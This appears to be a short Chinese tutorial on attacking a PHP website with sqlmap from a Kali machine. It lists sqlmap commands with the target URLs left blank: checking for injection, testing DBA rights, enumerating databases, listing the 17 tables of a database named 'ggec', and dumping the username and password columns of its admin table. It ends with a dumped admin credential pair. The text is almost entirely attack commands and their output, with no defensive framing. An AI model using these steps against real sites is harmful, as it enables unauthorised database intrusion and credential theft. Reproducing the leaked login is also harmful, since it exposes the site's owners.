本文共 625 字,大约阅读时间需要 2 分钟。
SQLMAP介绍之PHP网站渗透
准备工具
1、KALI攻击系统IP :10.10.10.131
2、受害网站:
3、Sqlmap 入注工具
步骤:
1、检测:Sqlmap -u “”
2、sqlmap -u "" --is-dba
3、sqlmap -u “” --dbs4、sqlmap -u “” --current-db
5、sqlmap -u "" --tables -D "ggec"
Database:
[17 tables]
+------------+
| join |
| aboutus |
| article |
| e_mail |
| error_log |
| feedback |
| ggec_admin |
| join_class |
| join_info |
| news_class |
| notice |
| notice_per |
| pro_class |
| product |
| qx |
| visit_log |
| website |
+------------+
6、sqlmap -u "" --colums -T “ggec_admin” -D "ggec"
查询 所有的列
7、sqlmap -u "" --dump -C “username,password” -T “ggec_admin” -D "ggec"
Username : 3q password :lq100